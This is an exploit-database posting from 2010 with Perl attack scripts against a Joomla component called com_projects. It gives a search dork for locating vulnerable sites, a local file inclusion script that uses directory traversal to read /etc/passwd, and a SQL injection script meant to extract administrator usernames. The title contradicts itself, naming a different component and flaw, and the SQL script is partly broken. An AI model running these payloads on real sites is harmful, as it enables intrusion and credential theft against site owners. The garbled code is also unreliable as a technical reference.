[webapps / 0day] - Joomla Component com_projects LFI &
Posted on 26 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Joomla Component com_projects LFI & SQL Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Joomla Component com_projects LFI & SQL Vulnerability by jos_ali_joe in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>====================================================== Joomla Component com_projects LFI & SQL Vulnerability ====================================================== [+]Title : Joomla Component com_calendrier RFI Vulnerability [+]Author : jos_ali_joe [+]Contact : josalijoe@yahoo.com [+]Home : http://josalijoe.wordpress.com/ ######################################################################## Dork : inurl:index.php?option="com_projects" ######################################################################## [ Software Information ] ######################################################################## [+] Vendor : http://www.codegravity.com/ [+] Download : http://www.joomla.org/download.html [+] version : Joomla 1.5 [+] Vulnerability : LFI and SQL Vulnerability [+] Dork : com_projects ######################################################################## [+] Exploit: LFI ==================================================================================== http://localhost/index.php?option=com_projects&controller=[ LFI ] ==================================================================================== use LWP::UserAgent; use HTTP::Request; use LWP::Simple; print " ######################################################## "; print " # Joomla Component com_projects LFI Vulnerability # "; print " # by jos_ali_joe # "; print " ######################################################## "; if (!$ARGV[0]) { print "Usage: perl idc.pl [HOST] "; print "Example: perl idc.pl http://localhost/LFI/ ";; } else { $web=$ARGV[0]; chomp $web; $iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00"; my $web1=$web.$iny; print "$web1 "; my $ua = LWP::UserAgent->new; my $req=HTTP::Request->new(GET=>$web1); $doc = $ua->request($req)->as_string; if ($doc=~ /^root/moxis ){ print "Web is vuln "; } else { print "Web is not vuln "; } } #################################################################################### [+] Exploit: SQL ==================================================================================== http://localhost/index.php?option=com_projects&view=project&id=[ SQL ] ==================================================================================== use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// Joomla Component com_projects SQL Injection Exploit [// Usage: idc.pl [target] [// Example: idc.pl localhost.com [// Vuln&Exp : jos_ali_joe [======================================================================== "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http://)//eg; $host = "http://".$server; $port = "80"; $file = "/index.php?option=com_projects&view=project&id="; print "Script <DIR> : "; $dir = <STDIN>; chop ($dir); if ($dir =~ /exit/){ print "-- Exploit Failed[You Are Exited] "; exit(); } if ($dir =~ ///){} else { print "-- Exploit Failed[No DIR] "; exit(); } $target = "SQL Injection Exploit"; $target = $host.$dir.$file.$target; #Writing data to socket print "+**********************************************************************+ "; print "+ Trying to connect: $server "; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die " + Connection failed... "; print $socket "GET $target HTTP/1.1 "; print $socket "Host: $server "; print $socket "Accept: * /* "; print $socket "Connection: close "; print "+ Connected!... "; #Getting while($answer = <$socket>) { if ($answer =~ /username:(.*?)pass/){ print "+ Exploit succeed! Getting admin information. "; print "+ ---------------- + "; print "+ Username: $1 "; } #################################################################################### Thanks : ./kaMtiEz – ibl13Z – Xrobot – tukulesto – R3m1ck – jundab - asickboys- Vyc0d – Yur4kha - XPanda - eL Farhatz ./ArRay – akatsuchi – K4pt3N – Gameover – antitos – yuki – pokeng – ffadill - Alecs - v3n0m - RJ45 ./Kiddies – pL4nkt0n – chaer newbie – andriecom – Abu_adam – Petimati - hakz – Virgi – Anharku - a17z a.k.a maho ./Me Family ATeN4 : ./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe Greets For : ./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber My Team : ./Indonesian Coder # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>
